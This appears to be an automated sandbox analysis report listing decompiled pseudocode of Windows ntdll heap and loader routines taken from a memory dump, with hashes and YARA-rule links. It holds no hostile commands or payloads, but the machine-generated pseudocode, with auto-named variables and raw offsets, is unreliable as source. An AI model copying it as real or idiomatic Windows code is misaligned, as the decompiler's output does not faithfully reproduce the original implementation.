                                                                                                        • HEAP: , xrefs: 00B3A0BA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                        • API String ID: 0-1340214556
                                                                                                        • Opcode ID: 43aabe141027b53f40787a03476ecd40580a019188d0178dcee1dfe105388259
                                                                                                        • Instruction ID: b381aa647be4ccb0e6acfdf6333d08f939788771e86a487521568541f52e29f4
                                                                                                        • Opcode Fuzzy Hash: 43aabe141027b53f40787a03476ecd40580a019188d0178dcee1dfe105388259
                                                                                                        • Instruction Fuzzy Hash: 45811271204688EFD726CBA8C895BB9BBF8FF04300F2445A5F6558B692D778ED40DB21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 74%
                                                                                                        			E00AEB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E00B8A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0xbb8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E00ACB150();
					__eflags =  *0xbb7bc8;
					if(__eflags == 0) {
						E00B82073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E00B8A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0xbb8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0xbb8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E00AEB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E00B8A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E00AEE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                                                        0x00aeb746
                                                                                                        0x00aeb74b
                                                                                                        0x00aeb74d
                                                                                                        0x00aeb750
                                                                                                        0x00aeb755
                                                                                                        0x00aeb758
                                                                                                        0x00aeb758
                                                                                                        0x00aeb75e
                                                                                                        0x00aeb763
                                                                                                        0x00aeb764
                                                                                                        0x00aeb76a
                                                                                                        0x00aeb76d
                                                                                                        0x00aeb771
                                                                                                        0x00aeb776
                                                                                                        0x00aeb85c
                                                                                                        0x00aeb85d
                                                                                                        0x00aeb860
                                                                                                        0x00aeb865
                                                                                                        0x00b32ba1
                                                                                                        0x00b32ba2
                                                                                                        0x00b32ba9
                                                                                                        0x00b32bae
                                                                                                        0x00b32bae
                                                                                                        0x00aeb77c
                                                                                                        0x00aeb77c
                                                                                                        0x00aeb77c
                                                                                                        0x00aeb785
                                                                                                        0x00aeb788
                                                                                                        0x00b32bb6
                                                                                                        0x00b32bb9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b32bbf
                                                                                                        0x00b32bc5
                                                                                                        0x00b32bc9
                                                                                                        0x00b32be8
                                                                                                        0x00b32bed
                                                                                                        0x00b32bcb
                                                                                                        0x00b32be0
                                                                                                        0x00b32be5
                                                                                                        0x00b32bf3
                                                                                                        0x00b32bf8
                                                                                                        0x00b32bfd
                                                                                                        0x00b32c05
                                                                                                        0x00b32c0e
                                                                                                        0x00b32c0e
                                                                                                        0x00000000
                                                                                                        0x00aeb78e
                                                                                                        0x00aeb78e
                                                                                                        0x00aeb78e
                                                                                                        0x00aeb791
                                                                                                        0x00aeb791
                                                                                                        0x00aeb797
                                                                                                        0x00aeb797
                                                                                                        0x00aeb79f
                                                                                                        0x00aeb7a9
                                                                                                        0x00aeb7af
                                                                                                        0x00aeb7af
                                                                                                        0x00aeb7b1
                                                                                                        0x00aeb7b6
                                                                                                        0x00aeb7e2
                                                                                                        0x00aeb7e2
                                                                                                        0x00aeb7e7
                                                                                                        0x00aeb880
                                                                                                        0x00aeb7ed
                                                                                                        0x00aeb7ed
                                                                                                        0x00aeb7ed
                                                                                                        0x00aeb7ef
                                                                                                        0x00aeb7f2
                                                                                                        0x00aeb7f2
                                                                                                        0x00aeb7f5
                                                                                                        0x00aeb7fa
                                                                                                        0x00b32c2d
                                                                                                        0x00b32c2e
                                                                                                        0x00b32c39
                                                                                                        0x00aeb800
                                                                                                        0x00aeb800
                                                                                                        0x00aeb802
                                                                                                        0x00aeb805
                                                                                                        0x00aeb808
                                                                                                        0x00aeb808
                                                                                                        0x00aeb80a
                                                                                                        0x00aeb80d
                                                                                                        0x00aeb816
                                                                                                        0x00aeb81c
                                                                                                        0x00aeb822
                                                                                                        0x00aeb82f
                                                                                                        0x00aeb88b
                                                                                                        0x00aeb892
                                                                                                        0x00aeb897
                                                                                                        0x00aeb899
                                                                                                        0x00aeb89b
                                                                                                        0x00aeb89e
                                                                                                        0x00aeb8a5
                                                                                                        0x00aeb8a8
                                                                                                        0x00aeb8aa
                                                                                                        0x00aeb8ac
                                                                                                        0x00aeb8ac
                                                                                                        0x00aeb8aa
                                                                                                        0x00aeb892
                                                                                                        0x00aeb831
                                                                                                        0x00aeb839
                                                                                                        0x00aeb83b
                                                                                                        0x00aeb83b
                                                                                                        0x00aeb844
                                                                                                        0x00aeb84b
                                                                                                        0x00aeb852
                                                                                                        0x00aeb7b8
                                                                                                        0x00aeb7ba
                                                                                                        0x00aeb7bf
                                                                                                        0x00aeb7c4
                                                                                                        0x00b32c18
                                                                                                        0x00b32c19
                                                                                                        0x00b32c23
                                                                                                        0x00aeb7ca
                                                                                                        0x00aeb7ca
                                                                                                        0x00aeb7cc
                                                                                                        0x00aeb7cf
                                                                                                        0x00aeb7d1
                                                                                                        0x00aeb7d1
                                                                                                        0x00aeb7d4
                                                                                                        0x00aeb7dc
                                                                                                        0x00aeb8bb
                                                                                                        0x00aeb8bb
                                                                                                        0x00aeb8be
                                                                                                        0x00aeb8be
                                                                                                        0x00aeb8c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aeb8c3
                                                                                                        0x00aeb8c5
                                                                                                        0x00aeb8c7
                                                                                                        0x00aeb8e0
                                                                                                        0x00000000
                                                                                                        0x00aeb8e0
                                                                                                        0x00aeb8cc
                                                                                                        0x00aeb8cc
                                                                                                        0x00000000
                                                                                                        0x00aeb8cc
                                                                                                        0x00aeb8d6
                                                                                                        0x00aeb8d6
                                                                                                        0x00000000
                                                                                                        0x00aeb7dc
                                                                                                        0x00aeb7b6

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-1334570610
                                                                                                        • Opcode ID: 86babc86c90b5060fe2237e347325e25dcc8b9ec0f7a128857229c63c65ce7ee
                                                                                                        • Instruction ID: afb5c75fc919dc2f413501e1bdfcd078e7eb1064a702e8fe7edcbbce7a39f131
                                                                                                        • Opcode Fuzzy Hash: 86babc86c90b5060fe2237e347325e25dcc8b9ec0f7a128857229c63c65ce7ee
                                                                                                        • Instruction Fuzzy Hash: 9261A070610281DFDB18DF25C489B6BBBE5FF44304F2485AEE8498B792D770E881CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AD7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E00AD7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00ADCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00ACC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xbb5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00B45510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xbb5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00AE7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00AE7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00B47016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00AE7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00AE7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00B47016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00AFA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00ACB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                        0x00ad7e4c
                                                                                                        0x00ad7e50
                                                                                                        0x00ad7e55
                                                                                                        0x00ad7e58
                                                                                                        0x00ad7e5d
                                                                                                        0x00ad7e71
                                                                                                        0x00ad7f33
                                                                                                        0x00ad7e77
                                                                                                        0x00ad7e77
                                                                                                        0x00ad7e79
                                                                                                        0x00ad7e79
                                                                                                        0x00ad7e7e
                                                                                                        0x00ad7f45
                                                                                                        0x00b29848
                                                                                                        0x00000000
                                                                                                        0x00b29848
                                                                                                        0x00ad7f4e
                                                                                                        0x00ad7f53
                                                                                                        0x00ad7f5a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b2985a
                                                                                                        0x00b29862
                                                                                                        0x00b29866
                                                                                                        0x00000000
                                                                                                        0x00b2986c
                                                                                                        0x00000000
                                                                                                        0x00b2986c
                                                                                                        0x00ad7e84
                                                                                                        0x00ad7e84
                                                                                                        0x00ad7e8d
                                                                                                        0x00b29871
                                                                                                        0x00ad7eb8
                                                                                                        0x00ad7ec0
                                                                                                        0x00ad7ec0
                                                                                                        0x00ad7e9a
                                                                                                        0x00b2987e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b29884
                                                                                                        0x00b2988b
                                                                                                        0x00b298a7
                                                                                                        0x00b298ac
                                                                                                        0x00b298b1
                                                                                                        0x00b298b6
                                                                                                        0x00b298b8
                                                                                                        0x00b298b8
                                                                                                        0x00b298b9
                                                                                                        0x00000000
                                                                                                        0x00b298b9
                                                                                                        0x00ad7ea0
                                                                                                        0x00ad7ea7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad7eac
                                                                                                        0x00ad7eb1
                                                                                                        0x00ad7ec6
                                                                                                        0x00ad7ed0
                                                                                                        0x00b298cc
                                                                                                        0x00ad7ed6
                                                                                                        0x00ad7ed6
                                                                                                        0x00ad7ed6
                                                                                                        0x00ad7ede
                                                                                                        0x00ad7ee3
                                                                                                        0x00b298e3
                                                                                                        0x00b298f0
                                                                                                        0x00b29902
                                                                                                        0x00b298f2
                                                                                                        0x00b298fb
                                                                                                        0x00b298fb
                                                                                                        0x00b29907
                                                                                                        0x00b2991d
                                                                                                        0x00b2991d
                                                                                                        0x00b29907
                                                                                                        0x00b298e3
                                                                                                        0x00ad7ef0
                                                                                                        0x00ad7f14
                                                                                                        0x00ad7f14
                                                                                                        0x00ad7f1e
                                                                                                        0x00b29946
                                                                                                        0x00ad7f24
                                                                                                        0x00ad7f24
                                                                                                        0x00ad7f24
                                                                                                        0x00ad7f2c
                                                                                                        0x00b2996a
                                                                                                        0x00b29975
                                                                                                        0x00b29975
                                                                                                        0x00b2997e
                                                                                                        0x00b29993
                                                                                                        0x00b29993
                                                                                                        0x00b2997e
                                                                                                        0x00000000
                                                                                                        0x00ad7ef2
                                                                                                        0x00ad7efc
                                                                                                        0x00ad7f0a
                                                                                                        0x00ad7f0e
                                                                                                        0x00b29933
                                                                                                        0x00000000
                                                                                                        0x00b29933
                                                                                                        0x00000000
                                                                                                        0x00ad7f0e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad7eb1

                                                                                                        Strings
                                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 00B29891
                                                                                                        • LdrpCompleteMapModule, xrefs: 00B29898
                                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 00B298A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                        • API String ID: 0-1676968949
                                                                                                        • Opcode ID: a3ea22baa12fc3d7932f15fb0a557dd0a91ebc43e53d9d373d06bc79347b7344
                                                                                                        • Instruction ID: 5f82afd34c1d895a0bc21e6c9ff16c5bb6512a1b9fd0c6dd013f9d97028454bf
                                                                                                        • Opcode Fuzzy Hash: a3ea22baa12fc3d7932f15fb0a557dd0a91ebc43e53d9d373d06bc79347b7344
                                                                                                        • Instruction Fuzzy Hash: 275103316087549BDB2ACB68C984B6E77E4FF05710F1406DAE85A9B3E2EB74ED00CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B723E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E00B723E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0xbb874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0xbb874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E00B1D4F0(_t83, 0xaa6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E00ACB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xbb6378 = 1;
						asm("int3");
						 *0xbb6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                                                        0x00b723e3
                                                                                                        0x00b723e8
                                                                                                        0x00b723eb
                                                                                                        0x00b723ee
                                                                                                        0x00b723f3
                                                                                                        0x00b7259b
                                                                                                        0x00b7259b
                                                                                                        0x00b7259d
                                                                                                        0x00b725a3
                                                                                                        0x00b725a3
                                                                                                        0x00b723fb
                                                                                                        0x00b72424
                                                                                                        0x00b7244f
                                                                                                        0x00b72460
                                                                                                        0x00b72451
                                                                                                        0x00b72451
                                                                                                        0x00b72456
                                                                                                        0x00b72458
                                                                                                        0x00b72458
                                                                                                        0x00b7245b
                                                                                                        0x00b7245b
                                                                                                        0x00b72426
                                                                                                        0x00b72431
                                                                                                        0x00b72436
                                                                                                        0x00b72443
                                                                                                        0x00b72438
                                                                                                        0x00b72438
                                                                                                        0x00b72438
                                                                                                        0x00b72445
                                                                                                        0x00b72445
                                                                                                        0x00b72463
                                                                                                        0x00b72469
                                                                                                        0x00b7246f
                                                                                                        0x00b72480
                                                                                                        0x00b72495
                                                                                                        0x00b724a1
                                                                                                        0x00b724ce
                                                                                                        0x00b724df
                                                                                                        0x00b724d0
                                                                                                        0x00b724d0
                                                                                                        0x00b724d5
                                                                                                        0x00b724d7
                                                                                                        0x00b724d7
                                                                                                        0x00b724da
                                                                                                        0x00b724da
                                                                                                        0x00b724a3
                                                                                                        0x00b724b0
                                                                                                        0x00b724b5
                                                                                                        0x00b724c2
                                                                                                        0x00b724b7
                                                                                                        0x00b724b7
                                                                                                        0x00b724b7
                                                                                                        0x00b724c4
                                                                                                        0x00b724c4
                                                                                                        0x00b724e8
                                                                                                        0x00b72497
                                                                                                        0x00b7249a
                                                                                                        0x00b7249a
                                                                                                        0x00b72482
                                                                                                        0x00b72488
                                                                                                        0x00b72488
                                                                                                        0x00b72471
                                                                                                        0x00b72479
                                                                                                        0x00b72479
                                                                                                        0x00b724ef
                                                                                                        0x00b723fd
                                                                                                        0x00b72401
                                                                                                        0x00b72412
                                                                                                        0x00b72403
                                                                                                        0x00b72403
                                                                                                        0x00b72408
                                                                                                        0x00b7240a
                                                                                                        0x00b7240a
                                                                                                        0x00b7240d
                                                                                                        0x00b7240d
                                                                                                        0x00b7241b
                                                                                                        0x00b7241b
                                                                                                        0x00b724f1
                                                                                                        0x00b724f6
                                                                                                        0x00b72507
                                                                                                        0x00b72510
                                                                                                        0x00000000
                                                                                                        0x00b72510
                                                                                                        0x00b7250b
                                                                                                        0x00000000
                                                                                                        0x00b724f8
                                                                                                        0x00b724f8
                                                                                                        0x00b724fc
                                                                                                        0x00b72500
                                                                                                        0x00b72512
                                                                                                        0x00b72515
                                                                                                        0x00b7251a
                                                                                                        0x00b72521
                                                                                                        0x00b72524
                                                                                                        0x00b72529
                                                                                                        0x00b7252f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b7253c
                                                                                                        0x00b7255c
                                                                                                        0x00b72561
                                                                                                        0x00b7253e
                                                                                                        0x00b72554
                                                                                                        0x00b72559
                                                                                                        0x00b7256a
                                                                                                        0x00b7256d
                                                                                                        0x00b72574
                                                                                                        0x00b72586
                                                                                                        0x00b72588
                                                                                                        0x00b7258f
                                                                                                        0x00b72590
                                                                                                        0x00b72590
                                                                                                        0x00b72597
                                                                                                        0x00000000
                                                                                                        0x00b72597

                                                                                                        Strings
                                                                                                        • HEAP[%wZ]: , xrefs: 00B7254F
                                                                                                        • HEAP: , xrefs: 00B7255C
                                                                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 00B7256F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                        • API String ID: 0-3815128232
                                                                                                        • Opcode ID: 0f9054fd9faf01378b7950f4da88a1bc848e79b3608a90909d9c116c51a1446c
                                                                                                        • Instruction ID: 6f84d4f472bb87939eab4e928fa6ff720946987431e557163f514c3e9178e71a
                                                                                                        • Opcode Fuzzy Hash: 0f9054fd9faf01378b7950f4da88a1bc848e79b3608a90909d9c116c51a1446c
                                                                                                        • Instruction Fuzzy Hash: 4B5125341002608EE734CF2AC89577277E1EB58744F65C8D9E9EA8B381D636DC46EB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ACE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                        Download Yara Rule
